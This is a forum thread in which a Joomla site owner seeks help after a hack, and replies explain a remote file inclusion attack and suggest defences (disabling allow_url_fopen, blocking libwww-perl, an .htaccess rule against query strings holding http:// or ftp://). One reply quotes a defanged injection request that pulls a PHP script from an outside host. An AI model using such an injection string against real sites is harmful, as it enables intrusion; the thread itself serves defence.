Any help guys? please
This is now 6h15 minutes that I replied to the tech person at lunardesk.
I think these should be answered more rapidly when our website is not online  .
So far I have done the following: in my whole website I found only a few .pl files, all in FCK editor mambot. I removed FCK editor totally although these were normal .pl files.  I erased and installed the very last version of coppermine and also replaced the files to go from 1.0.12 joomla to 1.0.13 .
I removed a few superfluous modules that I had and did not use. I also changed my account password.
What else can I do and if this is enough, could you enable my index.php file again please?
thanks a lot for any help
XaV

Thanks for your answer
well index.php is the main index.php of joomla
But since it is disabled I can't look at it, replace it or whatever..... permissions 000 But I think it is rather something that index.php file refers to that is loaded on the website and responsible.  But yes you are right, your link is the frontpage of my website (not exactly the last version though).
You mentionned how to block libwww-perl user agent bot. Could you let me know how to block it ? I guess this should be enough until I look further into everyting.

Edit : I did the following : I added this to the .htaccess in public_html
But I also saw Is this what I should do?
So could you explain a bit further please. are this pearl scripts introduced on my website and then they help to exploit it by using this libwww-perl?
Or just the bot probes my website and that is enough? If the first is right then why can't I find any .pl file in my whole website?

Thanks again
(and should I explain all that in my ticket? I know replying would make it go further down in terms or priority and it is not yet replied...)

The first one would work, since that is the same one I use on my site.

The bad files that enabled the hack don't need to be on your website. You can see in the logs that the bad stuff is hosted elsewhere. If a script isn't properly written to prevent it from accepting and processing content from anywhere, then it is vulnerable to getting, well, p0wned.

If you check your logs, you'll probably find a request somewhere that looks something like
/index.php?inc=hxxp://prvib.braindead.hu/rang.txt%3f%3f

rang.txt is a .txt file (a PHP script) that you can view in your browser. (hxxp://prvib.braindead.hu/rang.txt -- change xx to tt) PC-cillin identifies it as a dangerous website, of course, but viewing the file is (at this moment, anyway) "safe", being a text file. The remote site could do a port scan of any IP that makes a request, and attempt to do bad things, but nothing of that sort appeared in my firewall log. If you don't use AV/firewall, don't go visiting sites like that one.

When your page loaded, that rang.txt script was included into the page, and it ran.
It, in turn, loaded hxxp://prvib.braindead.hu/pvt.txt, which is a perl script (also safe to view in browser), and that ran, too.

In your php.ini file, set

allow_url_fopen = Off

Which will prevent that type of attack.
So will blocking libwww-perl in many instances, as TranzNDance said.
The more layers of protection, the better.

Edit:
Here's yet another layer. This one goes in .htaccess. It blocks any request containing a query string that contains either =http:// or =ftp:// . You cannot use this if you yourself use query strings having this format. If you upgrade scripts by an automated method, such as the SMF Package Manager, enable the exception line below (allowing yourself) before you begin the upgrade process, or it will fail.

RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
# Allow yourself when doing SMF Package Manager upgrades.
# Enable the next line and set it to your IP address at that moment.
#RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ [NC]
RewriteRule .* - [F,L]